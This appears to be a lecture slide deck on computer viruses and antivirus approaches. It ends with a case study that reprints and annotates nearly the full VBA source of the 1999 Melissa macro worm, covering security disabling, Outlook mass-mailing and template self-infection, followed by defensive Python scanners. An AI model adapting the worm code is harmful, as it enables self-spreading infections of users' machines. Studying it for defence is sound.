
Chapter 10

Viruses and Related Threats

Ali Saleh Chap10 1


Outline

• Viruses and Related Threats


– Malicious Programs
– The Nature of Viruses
– Antivirus Approaches
– Advanced Antivirus Techniques



Computer Viruses
A computer virus is a small
program that attaches itself to
another program and attacks
other software by making copies
of itself.



What is a Computer Virus?
• Computer Virus - The term was first
used by Fred Cohen in 1984.
• A computer virus is a small program that
attaches itself to another program and
attacks other software by making copies
of itself.
• A virus executes when an infected
program is executed. Therefore only
executable files can be infected.



Computer Viruses are Small
• Virus programs, like the infectious
microorganisms that are their
namesakes, are often small.
• Only a few lines of program code are
required to write a simple virus.
• The implication is clear: viruses can
be easily hidden in healthy software
and therefore prove very difficult to
find.
Viruses attach to programs

[Figure: Original Program + Virus Code = Modified Program (the virus code is attached to the original program)]


Viruses can be easily
hidden in healthy software

[Figure: Original Program + Virus Code = Modified Program (the modified program looks like the original)]


Who Do Computer Viruses
Infect and How?
• Viruses can infect any computer, from a small laptop to a
multi-million dollar mainframe.
• Anyone who owns a personal computer can create a virus
program. This means virus development tools are widely
available.
• Once written, a virus can be transmitted over telephone
lines or distributed on infected disks to other systems,
where it can reproduce in microseconds to damage the
biggest systems thousands of miles away.
• These two facts make it virtually impossible to trace any
virus back to the person who originally wrote it.



Destructive Non-Virus
Programs
• Aside from viruses, there are other
threats to user systems, including:
– Worms
– Trojan Horses
– Logic Bombs
• As well as being potentially
destructive by themselves, each can
also be used as a vehicle to propagate
any virus.
Worms
• Worm - A worm is a program (usually
stand-alone) that worms its way
through either the computer's
memory or a disk and alters data that
it accesses.
• It is different from a computer virus
since it does not require a host.



Worms
• Worms are constructed to infiltrate legitimate data
processing programs and alter or destroy the data. Often
what people believe is a virus infection is, in fact, a worm
program. This is not as serious because worms do not
replicate themselves. But the damage caused by a worm
attack can be just as serious as a virus, especially if not
discovered in time. For example, suppose a worm program
instructs a bank’s computer to transfer funds to an illicit
account. The fund transfers may continue even after the
worm is destroyed. However, once the worm invasion is
discovered, recovery is much easier because there is only a
single copy of the worm program to destroy since the
replicating ability of the virus is absent. This capability may
enable it to re-infect a system several times. A worm is
similar to a benign tumor while a virus is like a malignant one.



Trojan Horses
• Trojan horse - A program which attaches
itself to a seemingly innocent program.
• A Trojan Horse is a destructive program
that has been disguised (or concealed in) an
innocuous piece of software.
• Worm and virus programs may be concealed
within a Trojan Horse.
• Trojan horses do not necessarily replicate
– Trojan Horses are not viruses because
they do not reproduce themselves and
spread as viruses do.
Trojan Horses
• The mythical story of the original Trojan Horse is
well known. When Greek warriors concealed
themselves in an attractive wooden horse and left
it outside the gates of the besieged city of Troy,
the Trojans assumed it was a friendly peace
offering and took it in. The Greek warriors then
leaped out and wreaked havoc. Trojan Horse
software works on the same principle. A program
may seem both attractive and innocent, inviting
the computer user to copy (or download) the
software and run it. Trojan Horses may be games
or some other software that the victim will be
tempted to try.
Logic Bombs / Time Bomb
• Logic or time bomb - A program that
is activated or triggered after or
during a certain event.
• This may be after several executions
or on a certain day like Friday the
13th.



Logic Bombs
• Writing a logic bomb program is similar to creating
a Trojan Horse. Both also have about the same
ability to damage data, too. Logic bombs include a
timing device so it will go off at a particular date
and time.
• The Michelangelo virus is embedded in a logic bomb,
for example. Other virus programs often include
coding similar to that used in logic bombs, but the
bombs can be very destructive on their own, even if
they lack the ability of the virus to reproduce. One
logic bomb caused major problems in the Los
Angeles water department’s system.
Logic Bombs
• Logic bombs are usually timed to do maximum
damage. That means the logic bomb is a favored
device for revenge by disgruntled former
employees who can set it to activate after they
have left the company. One common trigger
occurs when the dismissed employee’s name is
deleted from payroll records. On one occasion, a
student left a logic bomb timed to explode and
wipe out his university’s records well after he
had collected his degree and was long gone. This
example illustrates the pernicious nature of
logic bombs which can be written literally
decades before they explode.
Rabbit
• A program that replicates itself without
limit to exhaust a resource.
• For example a program that keeps on
making copies of itself on the hard disk
till no hard disk space is left.
• Or a program that keeps loading
instances of itself in the memory till all
available memory is exhausted and the
system is unable to perform due to
unavailability of free memory.
• Rabbits are also called bacteria.
Summary of Malicious Code

Code Type      Characteristics
Virus          Attaches itself to a program and propagates copies of itself to other programs
Trojan horse   Contains unexpected, additional functionality
Logic bomb     Triggers action when condition occurs
Time bomb      Triggers action when specified time occurs
Trapdoor       Allows unauthorized access to functionality
Worm           Propagates copies of itself through a network
Rabbit         Replicates itself without limit to exhaust a resource

Summary of Malicious Code

[Figure: taxonomy of malicious programs]
Malicious Programs
– Needs host program: Trapdoors, Logic bombs, Trojan horses, Viruses
– Independent program: Bacteria, Worms
(Viruses, Bacteria and Worms are the types that replicate.)
Virus Phases
• Dormant phase - the virus is idle
• Propagation phase - the virus places an
identical copy of itself into other programs
• Triggering phase – the virus is activated
to perform the function for which it was
intended
• Execution phase – the function is
performed



Virus Protection
Have a well-known virus protection program, configured to
scan disks and downloads automatically for known viruses.

Do not execute programs (or "macros") from unknown
sources (e.g., PS files, Hypercard files, MS Office documents,

Avoid the most common operating systems and email
programs, if possible.


Types of Viruses
• Parasitic Virus - attaches itself to executable files as part
of their code. Runs whenever the host program runs.
• Memory-resident Virus - lodges in main memory as part of
the resident operating system.
• Boot Sector Virus - infects the boot sector of a disk, and
spreads when the operating system boots up (original DOS
viruses).
• Stealth Virus - explicitly designed to hide from virus
scanning programs.
• Polymorphic Virus - mutates with every new host to prevent
signature detection.
Macro Viruses
• Microsoft Office applications allow
“macros” to be part of the document. The
macro could run whenever the document is
opened, or when a certain command is
selected (Save File).
• Platform independent.
• Infect documents, delete files, generate
email and edit letters.



Antivirus Approaches
1st Generation, Scanners: searched files for any of a
library of known virus "signatures." Checked
executable files for length changes.

2nd Generation, Heuristic Scanners: look for more
general signs than specific signatures (code
segments common to many viruses). Checked files
for checksum or hash changes.

3rd Generation, Activity Traps: stay resident in
memory and look for certain patterns of software
behavior (e.g., scanning files).

4th Generation, Full Featured: combine the best of
the techniques above.
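The following Python script is an added example, not part of the slides, that puts the first two generations side by side: a signature scanner that looks for a fixed byte pattern, and an integrity check that records each file's length and SHA-256 while the system is believed clean and flags any later change. The "files" are constructed byte strings, the signature library holds only the "... by Kwyjibo" marker string shown later in the Melissa walkthrough, and the "polymorphic" sample simply XOR-encodes its appended body with a per-copy key; all of that is my own illustrative setup.

```python
import hashlib

# Constructed sample data, not taken from the slides: a stand-in "executable"
# and a stand-in viral body. The body carries the Melissa marker string shown
# in the slides so that the signature library has something to match.
CLEAN_PROGRAM = b"MZ\x90\x00" + b"legitimate program code" * 4
VIRAL_BODY = b"[viral code] ... by Kwyjibo"

# Illustrative signature library: name -> byte pattern (assumption: a real
# scanner holds thousands of such patterns).
SIGNATURES = {"Melissa marker": b"... by Kwyjibo"}


def signature_scan(data: bytes, signatures=SIGNATURES) -> list:
    """1st-generation scanner: report every known byte pattern found in data."""
    return [name for name, pattern in signatures.items() if pattern in data]


def build_baseline(files: dict) -> dict:
    """Record length and SHA-256 of each file while the system is believed clean."""
    return {name: (len(data), hashlib.sha256(data).hexdigest())
            for name, data in files.items()}


def integrity_check(files: dict, baseline: dict) -> dict:
    """2nd-generation check: flag files whose length or hash differs from the baseline."""
    findings = {}
    for name, data in files.items():
        if name not in baseline:
            findings[name] = "no baseline entry"
            continue
        old_len, old_hash = baseline[name]
        if len(data) != old_len:
            findings[name] = f"length changed {old_len} -> {len(data)}"
        elif hashlib.sha256(data).hexdigest() != old_hash:
            findings[name] = "same length, hash changed"
    return findings


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def make_samples() -> dict:
    """Constructed on-disk state after infection: one untouched copy, one copy
    with the viral body appended verbatim, and one 'polymorphic' copy whose
    body is XOR-encoded with a per-copy key so no fixed byte pattern survives."""
    key = 0x5A
    return {
        "clean.exe": CLEAN_PROGRAM,
        "infected.exe": CLEAN_PROGRAM + VIRAL_BODY,
        "poly.exe": CLEAN_PROGRAM + bytes([key]) + xor_bytes(VIRAL_BODY, key),
    }


def run_demo() -> tuple:
    """Baseline every file as the clean program, then 'infect' and run both checks."""
    baseline = build_baseline({n: CLEAN_PROGRAM for n in ("clean.exe", "infected.exe", "poly.exe")})
    files = make_samples()
    sig_results = {name: signature_scan(data) for name, data in files.items()}
    integrity_results = integrity_check(files, baseline)
    return sig_results, integrity_results


if __name__ == "__main__":
    sigs, integ = run_demo()
    for name in sigs:
        print(f"{name:13s} signature: {str(sigs[name] or 'none'):25s} integrity: {integ.get(name, 'ok')}")
```

The signature scanner catches only the verbatim copy; the polymorphic copy evades it, but both copies change the file's length and hash, which is why the second-generation checksum approach catches what the first misses. Two caveats follow from the virus types listed above: a stealth virus that stays memory-resident can intercept the reads the checker performs, so the baseline should be taken from a clean boot and kept off the host; and length alone is a weak indicator, since a virus can pad the file back to its original size, which is why the hash comparison is kept even when the length matches.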
Advanced Antivirus
Techniques



Melissa Virus



Background
• On Friday, March 26, 1999, the Melissa virus was launched.
• On Saturday, March 27, CERT issued CA-99-04.
• By Sunday, March 28, Melissa had reached at least 100,000 computers at over 300
organizations.
• On Monday, March 29, Christopher Bubb, Head, Computer Analysis and
Technology, NJ State Division of Criminal Justice, received a call from John Ryan,
Associate General Counsel for AOL, notifying him that:
– AOL was a conduit for the release of Melissa.
– An alt.sex site had promised a list of sexually oriented web sites through a file
called list.zip.
– Personnel who downloaded and ran the program released the virus.
• AOL tagged individual messages with a unique ID number which provided
information on the equipment the message came from.
• Melissa had originated at a New Jersey ISP, Monmouth Internet.


Background Contd
• On Tuesday, March 30, Bubb obtained search warrants authorizing AOL and
Monmouth ISP to release information beyond what the investigators could observe.
• Monmouth ISP furnished the New Jersey investigators two Automatic Number Index
(ANI - caller ID) records, which provided:
– The originating telephone and the house containing the telephone.
– A second telephone located at a business address.
• The NJ investigators obtained a search warrant for the Aberdeen, NJ residence;
however, the suspect had fled, taking his computers with him.
• Subsequent detective work led them to his brother's house.
• David L. Smith, 30, was apprehended at 0900, Thursday, April 1, just 4 days after
Bubb had been notified.
• Smith admitted to causing $80M in damage, which is the upper limit in federal
sentencing guidelines.
• Melissa was named after an exotic dancer Smith had known while attending
school in Florida.
• Prosecutors recommended 3-5 years imprisonment.


Melissa Code



Melissa Overview
• The user opens a message with the viral code attached.
• This automatically launches the viral code due to the Open event.
• The virus then checks and disables the security features.
• The virus then starts Outlook and sends a personalized message
to the first 50 entries.
• The virus then modifies a Registry key to contain the creator's name.
• The virus then modifies NORMAL.DOT to contain the virus.
• The author then provides comments and ends the virus.
Melissa works by infecting the Document_Open() macro of Microsoft Word.
Any code placed in the Document_Open() macro runs immediately when the user opens the Word file.
The infected document is typically attached to an e-mail.

******************************************************
Private Sub Document_Open() ' An OPEN event runs when the document is opened.
On Error Resume Next ' Forge ahead and do not display an error message block.
******************************************************
Melissa now disables the macro security features of Microsoft Word.
This allows it to avoid alerting the user.
*************************************************************
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    'A non-empty value means Word 2000: disable the Security menu item and set the security level to 1
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
Else 'An empty string indicates Word 97
    CommandBars("Tools").Controls("Macro").Enabled = False 'Disable the Macro menu
    Options.ConfirmConversions = (1 - 1) 'Turn off file conversion confirmation
    Options.VirusProtection = (1 - 1) 'Turn off macro virus protection
    Options.SaveNormalPrompt = (1 - 1) 'Turn off the prompt to save the Normal template
End If
Melissa now accesses the e-mail system through the Messaging API (MAPI)
feature.
It uses this access to send e-mail to the first fifty entries.
*********************************************
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice 'Variable declaration
Set UngaDasOutlook = CreateObject("Outlook.Application") 'Create an instance of Outlook and reference it with the variable
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") 'Assign the MAPI message store containing all Outlook items to the variable
********************************************
Melissa checks the Registry key to see if it has already run.
**************************************************
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then ' Begin the main loop
'If this statement is true then execute the code, otherwise skip to the matching End If
Melissa checks to see if the e-mail application is Outlook.
If it is Outlook, then a list of 50 e-mail addresses is composed.
*************************************************
If UngaDasOutlook = "Outlook" Then ' Begin the 1st inner loop
    DasMapiName.Logon "profile", "password" 'Log onto Outlook
    For y = 1 To DasMapiName.AddressLists.Count ' Begin the 2nd inner loop
        Set AddyBook = DasMapiName.AddressLists(y) 'Set the variable to the current Outlook address list
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) 'Create a new mail message
        For oo = 1 To AddyBook.AddressEntries.Count ' Begin the 3rd inner loop
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep 'Accumulate the Outlook address in the message
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count 'Terminate the loop after 50 entries
        Next oo 'End the 3rd inner loop
Melissa now sends an e-mail to the 50 addresses found in the previous code.
The e-mail is personalized using the victim's name.
*******************************************************
        BreakUmOffASlice.Subject = "Important Message From " & Application.UserName 'Concatenate the subject with the Outlook user name
        BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" 'A nudge-nudge, wink-wink suggestive message
*******************************************
Melissa now attaches itself to the e-mail and sends it to the addresses.
Melissa then logs off Outlook.
*******************************************
        BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
        BreakUmOffASlice.Send 'Send the message
        Peep = "" 'Set Peep to an empty string
    Next y 'End the 2nd inner loop
    DasMapiName.Logoff 'Log off Outlook
End If 'End the 1st inner loop
Melissa sets the Registry key to make sure that no more e-mail is sent from
this host.
Melissa previously checked this entry.

*************************************
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
'Sets the Melissa? Registry entry to the author.
'This prevents sending another message after reinfection.

End If 'End the main loop

************************************


• Melissa checks to see if the active document is infected.
• If not, then it sets the infection flag.
*********************************
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) 'Assign the first code module in the active document to the variable
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) 'Assign the first code module in the template document to the variable
NTCL = NTI1.CodeModule.CountOfLines 'Assign the number of code lines to the variable
ADCL = ADI1.CodeModule.CountOfLines 'Assign the number of code lines to the variable
BGN = 2
If ADI1.Name <> "Melissa" Then 'If the name Melissa is not present on the first VBComponent then
    If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL 'If the VBComponent has any lines, delete them all
    Set ToInfect = ADI1
    ADI1.Name = "Melissa" 'Set the Name property to Melissa
    DoAD = True 'Set this variable to indicate that the Active Document is infected
End If
****************************************
• It now checks to see if the normal.dot template is infected.
• If not, then it sets the infection flag.
• Then it does a final check and, if necessary, jumps to the exit code CYA.
*********************************************
If NTI1.Name <> "Melissa" Then
    If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
    Set ToInfect = NTI1
    NTI1.Name = "Melissa"
    dont = True 'Set this variable to indicate that the Template is infected
End If

If dont <> True And DoAD <> True Then GoTo CYA
********************************************
Melissa now modifies the Document_Open() function of the Active
Document.
***************************************************
If dont = True Then 'Delete each blank line of code at the beginning of the Active Document code module
    Do While ADI1.CodeModule.Lines(1, 1) = ""
        ADI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") 'Add the opening line of a Close event procedure to the ToInfect code module
    Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
        ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) 'Copy each line of the Active Document code module to ToInfect, starting with BGN = 2
        BGN = BGN + 1
    Loop
End If
**************************************************************
Melissa now modifies the Document_Close() function of the Document
Template.
• Created, closed, or modified documents will now run Melissa.
*********************************************************
If DoAD = True Then 'Delete each blank line of code at the beginning of the Document Template code module
    Do While NTI1.CodeModule.Lines(1, 1) = ""
        NTI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") 'Add the opening line of an Open event procedure to the ToInfect code module
    Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
        ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) 'Copy each line of the Document Template code module to ToInfect, starting with BGN = 2
        BGN = BGN + 1
    Loop
End If
*********************************************************
• Melissa now saves the current active document and
• saves a copy of itself.
*****************************************************
CYA: 'CYA subroutine
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then 'If the Active Document's name does not contain "Document", save it
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
    ActiveDocument.Saved = True 'If the Active Document's name contains "Document", set its Saved property to True
End If
**********************************************
The author now comments his code to reflect that he wrote Melissa and
displays a character string based upon the If statement.
*********************************************
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <-> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then 'If the day of the month equals the current minute
    Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End If
End Sub
*************************************************************
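The walkthrough above shows the four behaviours that make Melissa what it is: an auto-run event, tampering with Word's macro security settings, mass mailing through Outlook, and copying its own code module into NORMAL.DOT. The Python script below is an added detection example, not code from the slides, that scores extracted macro source text against those behaviours in the manner of a heuristic (2nd-generation) scanner, with the "Melissa?" Registry key and the "Kwyjibo" string kept as a plain signature. It assumes the VBA source has already been pulled out of the document (a tool such as olevba from the oletools project does that); the indicator patterns, the verdict thresholds and the four sample macros are my own constructions.

```python
import re

# Behaviour categories and the VBA constructs that indicate each one, as
# case-insensitive regular expressions over macro source text (assumed to be
# already extracted from the document; this scanner does not parse .doc files).
INDICATORS = {
    "auto-execute event": [r"\bDocument_(Open|Close)\b", r"\bAuto(Open|Close|Exec)\b"],
    "disables macro security": [
        r"Options\.VirusProtection\s*=",
        r'Word\\Security.*"Level"',
        r"CommandBars\(.*\)\.Controls\(.*\)\.Enabled\s*=\s*False",
    ],
    "mass mailing": [
        r'CreateObject\(\s*"Outlook\.Application"\s*\)',
        r"\.Recipients\.Add\b",
        r"\.Attachments\.Add\b",
        r"\.Send\b",
    ],
    "self-replication into Normal template": [
        r"NormalTemplate\.VBProject",
        r"\.CodeModule\.(AddFromString|InsertLines)\b",
    ],
    "Melissa marker": [r'"Melissa\?"', r"\bKwyjibo\b"],
}


def scan_macro(source: str) -> dict:
    """Return {category: [matched text, ...]} for every category seen in source."""
    hits = {}
    for category, patterns in INDICATORS.items():
        found = [m.group(0) for m in (re.search(p, source, re.IGNORECASE) for p in patterns) if m]
        if found:
            hits[category] = found
    return hits


def verdict(hits: dict) -> str:
    """Combine categories into a verdict; the thresholds are the tunable part."""
    cats = set(hits)
    if "Melissa marker" in cats:
        return "malicious (Melissa signature)"
    if "auto-execute event" in cats and len(cats) >= 3:
        return "malicious (auto-run macro worm behaviour)"
    if "disables macro security" in cats or len(cats) >= 2:
        return "suspicious"
    if cats:
        return "review"
    return "clean"


def scan_all(samples: dict) -> dict:
    return {name: verdict(scan_macro(src)) for name, src in samples.items()}


# Constructed macro sources. MELISSA_LIKE condenses the constructs walked
# through in the slides, without the author's marker; MELISSA_MARKED adds it.
# The other two are invented benign macros.
MELISSA_LIKE = r'''Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
Else
Options.VirusProtection = (1 - 1)
End If
Set UngaDasOutlook = CreateObject("Outlook.Application")
BreakUmOffASlice.Recipients.Add Peep
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
End Sub'''

MELISSA_MARKED = MELISSA_LIKE.replace(
    "End Sub",
    r'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"'
    + "\nEnd Sub")

FORMAT_REPORT = '''Sub FormatReport()
Selection.Font.Bold = True
ActiveDocument.Save
End Sub'''

SEND_NEWSLETTER = '''Sub SendNewsletter()
Set app = CreateObject("Outlook.Application")
Set msg = app.CreateItem(0)
msg.Recipients.Add "team@example.com"
msg.Send
End Sub'''

SAMPLES = {"melissa_like": MELISSA_LIKE, "melissa_marked": MELISSA_MARKED,
           "format_report": FORMAT_REPORT, "send_newsletter": SEND_NEWSLETTER}

if __name__ == "__main__":
    for name, result in scan_all(SAMPLES).items():
        print(f"{name:16s} {result}")
        for cat, found in scan_macro(SAMPLES[name]).items():
            print(f"    {cat}: {found}")
```

The point of the two malicious samples is that the signature path only fires on the "Melissa?"/"Kwyjibo" strings, which a variant can trivially drop, while the behaviour path still flags the unmarked copy because the combination of an auto-run event with security tampering, mailing and Normal-template writes has no legitimate reason to exist in one macro. The newsletter macro shows the cost: mailing on its own is a normal thing for a macro to do, so it is marked for review rather than blocked, and where the thresholds sit between "review", "suspicious" and "malicious" is a policy decision, not something the patterns decide.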
End of Case

